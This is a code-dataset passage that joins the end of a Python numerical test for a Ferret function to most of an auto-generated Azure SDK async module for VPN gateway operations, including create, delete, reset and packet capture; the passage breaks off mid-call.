inpbdfs = numpy.array([-1.0, 0.0, 0.0], dtype=numpy.float64)
resbdf = numpy.array([-2.0], dtype=numpy.float64)
quantile = numpy.empty((1, dimen, 1, 1, 1, 1), dtype=numpy.float64, order='F')
expected = numpy.empty((1, dimen, 1, 1, 1, 1), dtype=numpy.float64, order='F')
for j in range(dimen):
if (j % 7) == 3:
quantile[0, j, 0, 0, 0, 0] = inpbdfs[0]
expected[0, j, 0, 0, 0, 0] = resbdf[0]
else:
quantile[0, j, 0, 0, 0, 0] = qvals[j]
expected[0, j, 0, 0, 0, 0] = isfvals[j]
result = -888.0 * numpy.ones((1, dimen, 1, 1, 1, 1), dtype=numpy.float64, order='F')
ferret_compute(0, result, resbdf, (quantile, pfname, pfparams), inpbdfs)
if not numpy.allclose(result, expected):
print("Expected (flattened) = %s" % str(expected.reshape(-1)))
print("Result (flattened) = %s" % str(result.reshape(-1)))
raise ValueError("Unexpected result")
# All successful
print("Success")
| 39.144444 | 114 | 0.641783 |
f38a0d411433e6658439691eb6e6a2894b90f025
| 48,564 |
py
|
Python
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_vpn_gateways_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 2 |
2021-03-24T06:26:11.000Z
|
2021-04-18T15:55:59.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_vpn_gateways_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 4 |
2019-04-17T17:57:49.000Z
|
2020-04-24T21:11:22.000Z
|
sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_vpn_gateways_operations.py
|
beltr0n/azure-sdk-for-python
|
2f7fb8bee881b0fc0386a0ad5385755ceedd0453
|
[
"MIT"
] | 2 |
2021-05-23T16:46:31.000Z
|
2021-05-26T23:51:09.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VpnGatewaysOperations:
"""VpnGatewaysOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> "_models.VpnGateway":
"""Retrieves the details of a virtual wan vpn gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VpnGateway, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_06_01.models.VpnGateway
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
gateway_name: str,
vpn_gateway_parameters: "_models.VpnGateway",
**kwargs
) -> "_models.VpnGateway":
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(vpn_gateway_parameters, 'VpnGateway')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
gateway_name: str,
vpn_gateway_parameters: "_models.VpnGateway",
**kwargs
) -> AsyncLROPoller["_models.VpnGateway"]:
"""Creates a virtual wan vpn gateway if it doesn't exist else updates the existing gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param vpn_gateway_parameters: Parameters supplied to create or Update a virtual wan vpn
gateway.
:type vpn_gateway_parameters: ~azure.mgmt.network.v2020_06_01.models.VpnGateway
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_06_01.models.VpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
vpn_gateway_parameters=vpn_gateway_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def _update_tags_initial(
self,
resource_group_name: str,
gateway_name: str,
vpn_gateway_parameters: "_models.TagsObject",
**kwargs
) -> Optional["_models.VpnGateway"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.VpnGateway"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(vpn_gateway_parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def begin_update_tags(
self,
resource_group_name: str,
gateway_name: str,
vpn_gateway_parameters: "_models.TagsObject",
**kwargs
) -> AsyncLROPoller["_models.VpnGateway"]:
"""Updates virtual wan vpn gateway tags.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param vpn_gateway_parameters: Parameters supplied to update a virtual wan vpn gateway tags.
:type vpn_gateway_parameters: ~azure.mgmt.network.v2020_06_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_06_01.models.VpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_tags_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
vpn_gateway_parameters=vpn_gateway_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes a virtual wan vpn gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def _reset_initial(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> Optional["_models.VpnGateway"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.VpnGateway"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self._reset_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reset_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset'} # type: ignore
async def begin_reset(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> AsyncLROPoller["_models.VpnGateway"]:
"""Resets the primary of the vpn gateway in the specified resource group.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_06_01.models.VpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reset_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reset.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset'} # type: ignore
async def _start_packet_capture_initial(
self,
resource_group_name: str,
gateway_name: str,
parameters: Optional["_models.VpnGatewayPacketCaptureStartParameters"] = None,
**kwargs
) -> Optional[str]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._start_packet_capture_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if parameters is not None:
body_content = self._serialize.body(parameters, 'VpnGatewayPacketCaptureStartParameters')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('str', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_start_packet_capture_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/startpacketcapture'} # type: ignore
async def begin_start_packet_capture(
self,
resource_group_name: str,
gateway_name: str,
parameters: Optional["_models.VpnGatewayPacketCaptureStartParameters"] = None,
**kwargs
) -> AsyncLROPoller[str]:
"""Starts packet capture on vpn gateway in the specified resource group.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param parameters: Vpn gateway packet capture parameters supplied to start packet capture on
vpn gateway.
:type parameters: ~azure.mgmt.network.v2020_06_01.models.VpnGatewayPacketCaptureStartParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either str or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[str]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[str]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._start_packet_capture_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('str', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_start_packet_capture.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/startpacketcapture'} # type: ignore
async def _stop_packet_capture_initial(
self,
resource_group_name: str,
gateway_name: str,
parameters: Optional["_models.VpnGatewayPacketCaptureStopParameters"] = None,
**kwargs
) -> Optional[str]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._stop_packet_capture_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if parameters is not None:
body_content = self._serialize.body(parameters, 'VpnGatewayPacketCaptureStopParameters')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('str', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_stop_packet_capture_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/stoppacketcapture'} # type: ignore
async def begin_stop_packet_capture(
self,
resource_group_name: str,
gateway_name: str,
parameters: Optional["_models.VpnGatewayPacketCaptureStopParameters"] = None,
**kwargs
) -> AsyncLROPoller[str]:
"""Stops packet capture on vpn gateway in the specified resource group.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param parameters: Vpn gateway packet capture parameters supplied to stop packet capture on vpn
gateway.
:type parameters: ~azure.mgmt.network.v2020_06_01.models.VpnGatewayPacketCaptureStopParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either str or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[str]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[str]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._stop_packet_capture_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
parameters=parameters,
